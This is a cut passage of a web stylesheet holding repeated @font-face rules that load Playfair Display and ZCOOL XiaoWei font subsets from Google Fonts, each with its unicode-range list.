url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7yRZrPA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7yRZrPA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7yRZrPA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7yRZrPA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7yRZrPA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgEM86xQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgEM86xQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgEM86xQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgEM86xQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgEM86xQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgEM86xQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.5.woff2) format(\'woff2\');unicode-range: U+fee3, U+fef3, U+ff03-ff04, U+ff07, U+ff0a, U+ff17-ff19, U+ff1c-ff1d, U+ff20-ff3a, U+ff3c, U+ff3e-ff5b, U+ff5d, U+ff61-ff65, U+ff67-ff6a, U+ff6c, U+ff6f-ff78, U+ff7a-ff7d, U+ff80-ff84, U+ff86, U+ff89-ff8e, U+ff92, U+ff97-ff9b, U+ff9d-ff9f, U+ffe0-ffe4, U+ffe6, U+ffe9, U+ffeb, U+ffed, U+fffc, U+1f004, U+1f170-1f171, U+1f192-1f195, U+1f198-1f19a, U+1f1e6-1f1e8;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.6.woff2) format(\'woff2\');unicode-range: U+f0a7, U+f0b2, U+f0b7, U+f0c9, U+f0d8, U+f0da, U+f0dc-f0dd, U+f0e0, U+f0e6, U+f0eb, U+f0fc, U+f101, U+f104-f105, U+f107, U+f10b, U+f11b, U+f14b, U+f18a, U+f193, U+f1d6-f1d7, U+f244, U+f27a, U+f296, U+f2ae, U+f471, U+f4b3, U+f610-f611, U+f880-f881, U+f8ec, U+f8f5, U+f8ff, U+f901, U+f90a, U+f92c-f92d, U+f934, U+f937, U+f941, U+f965, U+f967, U+f969, U+f96b, U+f96f, U+f974, U+f978-f979, U+f97e, U+f981, U+f98a, U+f98e, U+f997, U+f99c, U+f9b2, U+f9b5, U+f9ba, U+f9be, U+f9ca, U+f9d0-f9d1, U+f9dd, U+f9e0-f9e1, U+f9e4, U+f9f7, U+fa00-fa01, U+fa08, U+fa0a, U+fa11, U+fb01-fb02, U+fdfc, U+fe0e, U+fe30-fe31, U+fe33-fe44, U+fe49-fe52, U+fe54-fe57, U+fe59-fe66, U+fe68-fe6b, U+fe8e, U+fe92-fe93, U+feae, U+feb8, U+fecb-fecc, U+fee0;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.21.woff2) format(\'woff2\');unicode-range: U+9f83, U+9f85-9f8d, U+9f90-9f91, U+9f94-9f96, U+9f98, U+9f9b-9f9c, U+9f9e, U+9fa0, U+9fa2, U+9ff0-9fff, U+a001, U+a007, U+a025, U+a046-a047, U+a057, U+a072, U+a078-a079, U+a083, U+a085, U+a100, U+a118, U+a132, U+a134, U+a1f4, U+a242, U+a4a6, U+a4aa, U+a4b0-a4b1, U+a4b3, U+a9c1-a9c2, U+ac00-ac01, U+ac04, U+ac08, U+ac10-ac11, U+ac13-ac16, U+ac19, U+ac1c-ac1d, U+ac24, U+ac70-ac71, U+ac74, U+ac77-ac78, U+ac80-ac81, U+ac83, U+ac8c, U+ac90, U+ac9f-aca0, U+aca8-aca9, U+acac, U+acb0, U+acbd, U+acc1, U+acc4, U+ace0-ace1, U+ace4, U+ace8, U+acf3, U+acf5, U+acfc-acfd, U+ad00, U+ad0c, U+ad11, U+ad1c, U+ad34, U+ad50, U+ad64, U+ad6c, U+ad70, U+ad74, U+ad7f, U+ad81, U+ad8c, U+adc0, U+adc8, U+addc, U+ade0, U+adf8-adf9, U+adfc, U+ae00, U+ae08-ae09, U+ae0b, U+ae30, U+ae34, U+ae38, U+ae40, U+ae4a, U+ae4c, U+ae54, U+ae68, U+aebc, U+aed8, U+af2c-af2d;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.22.woff2) format(\'woff2\');unicode-range: U+9e30-9e33, U+9e35-9e3b, U+9e3e, U+9e40-9e44, U+9e46-9e4e, U+9e51, U+9e53, U+9e55-9e58, U+9e5a-9e5c, U+9e5e-9e63, U+9e66-9e6e, U+9e71, U+9e73, U+9e75, U+9e78-9e79, U+9e7c-9e7e, U+9e82, U+9e86-9e88, U+9e8b-9e8c, U+9e90-9e91, U+9e93, U+9e95, U+9e97, U+9e9d, U+9ea4-9ea5, U+9ea9-9eaa, U+9eb4-9eb5, U+9eb8-9eba, U+9ebc-9ebf, U+9ec3, U+9ec9, U+9ecd, U+9ed0, U+9ed2-9ed3, U+9ed5-9ed6, U+9ed9, U+9edc-9edd, U+9edf-9ee0, U+9ee2, U+9ee5, U+9ee7-9eea, U+9eef, U+9ef1, U+9ef3-9ef4, U+9ef6, U+9ef9, U+9efb-9efc, U+9efe, U+9f0b, U+9f0d, U+9f10, U+9f14, U+9f17, U+9f19, U+9f22, U+9f29, U+9f2c, U+9f2f, U+9f31, U+9f37, U+9f39, U+9f3d-9f3e, U+9f41, U+9f4a-9f4b, U+9f51-9f52, U+9f61-9f63, U+9f66-9f67, U+9f80-9f81;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.23.woff2) format(\'woff2\');unicode-range: U+9c82-9c83, U+9c85-9c8c, U+9c8e-9c92, U+9c94-9c9b, U+9c9e-9ca3, U+9ca5-9ca7, U+9ca9, U+9cab, U+9cad-9cae, U+9cb1-9cb7, U+9cb9-9cbd, U+9cbf-9cc0, U+9cc3, U+9cc5-9cc7, U+9cc9-9cd1, U+9cd3-9cda, U+9cdc-9cdd, U+9cdf, U+9ce1-9ce3, U+9ce5, U+9ce9, U+9cee-9cef, U+9cf3-9cf4, U+9cf6, U+9cfc-9cfd, U+9d02, U+9d08-9d09, U+9d12, U+9d1b, U+9d1e, U+9d26, U+9d28, U+9d37, U+9d3b, U+9d3f, U+9d51, U+9d59, U+9d5c-9d5d, U+9d5f-9d61, U+9d6c, U+9d70, U+9d72, U+9d7a, U+9d7e, U+9d84, U+9d89, U+9d8f, U+9d92, U+9daf, U+9db4, U+9db8, U+9dbc, U+9dc4, U+9dc7, U+9dc9, U+9dd7, U+9ddf, U+9df2, U+9df9-9dfa, U+9e0a, U+9e11, U+9e1a, U+9e1e, U+9e20, U+9e22, U+9e28-9e2c, U+9e2e-9e2f;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.24.woff2) format(\'woff2\');unicode-range: U+9a80, U+9a83, U+9a85, U+9a88-9a8a, U+9a8d-9a8e, U+9a90, U+9a92-9a93, U+9a95-9a96, U+9a98-9a99, U+9a9b-9aa2, U+9aa5, U+9aa7, U+9aaf-9ab1, U+9ab5-9ab6, U+9ab9-9aba, U+9ac0-9ac4, U+9ac8, U+9acb-9acc, U+9ace-9acf, U+9ad1-9ad2, U+9ad9, U+9adf, U+9ae1, U+9ae3, U+9aea-9aeb, U+9aed-9aef, U+9af4, U+9af9, U+9afb, U+9b03-9b04, U+9b06, U+9b08, U+9b0d, U+9b0f-9b10, U+9b13, U+9b18, U+9b1a, U+9b1f, U+9b22-9b23, U+9b25, U+9b27-9b28, U+9b2a, U+9b2f, U+9b31-9b32, U+9b3b, U+9b43, U+9b46-9b49, U+9b4d-9b4e, U+9b51, U+9b56, U+9b58, U+9b5a, U+9b5c, U+9b5f, U+9b61-9b62, U+9b6f, U+9b77, U+9b80, U+9b88, U+9b8b, U+9b8e, U+9b91, U+9b9f-9ba0, U+9ba8, U+9baa-9bab, U+9bad-9bae, U+9bb0-9bb1, U+9bb8, U+9bc9-9bca, U+9bd3, U+9bd6, U+9bdb, U+9be8, U+9bf0-9bf1, U+9c02, U+9c10, U+9c15, U+9c24, U+9c2d, U+9c32, U+9c39, U+9c3b, U+9c40, U+9c47-9c49, U+9c53, U+9c57, U+9c64, U+9c72, U+9c77-9c78, U+9c7b, U+9c7f-9c80;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.25.woff2) format(\'woff2\');unicode-range: U+98dd, U+98e1-98e2, U+98e7-98ea, U+98ec, U+98ee-98ef, U+98f2, U+98f4, U+98fc-98fe, U+9903, U+9905, U+9908, U+990a, U+990c-990d, U+9913-9914, U+9918, U+991a-991b, U+991e, U+9921, U+9928, U+992c, U+992e, U+9935, U+9938-9939, U+993d-993e, U+9945, U+994b-994c, U+9951-9952, U+9954-9955, U+9957, U+995e, U+9963, U+9966-9969, U+996b-996c, U+996f, U+9974-9975, U+9977-9979, U+997d-997e, U+9980-9981, U+9983-9984, U+9987, U+998a-998b, U+998d-9991, U+9993-9995, U+9997-9998, U+99a5, U+99ab, U+99ad-99ae, U+99b1, U+99b3-99b4, U+99bc, U+99bf, U+99c1, U+99c3-99c6, U+99cc, U+99d0, U+99d2, U+99d5, U+99db, U+99dd, U+99e1, U+99ed, U+99f1, U+99ff, U+9a01, U+9a03-9a04, U+9a0e-9a0f, U+9a11-9a13, U+9a19, U+9a1b, U+9a28, U+9a2b, U+9a30, U+9a32, U+9a37, U+9a40, U+9a45, U+9a4a, U+9a4d-9a4e, U+9a52, U+9a55, U+9a57, U+9a5a-9a5b, U+9a5f, U+9a62, U+9a65, U+9a69, U+9a6b, U+9a6e, 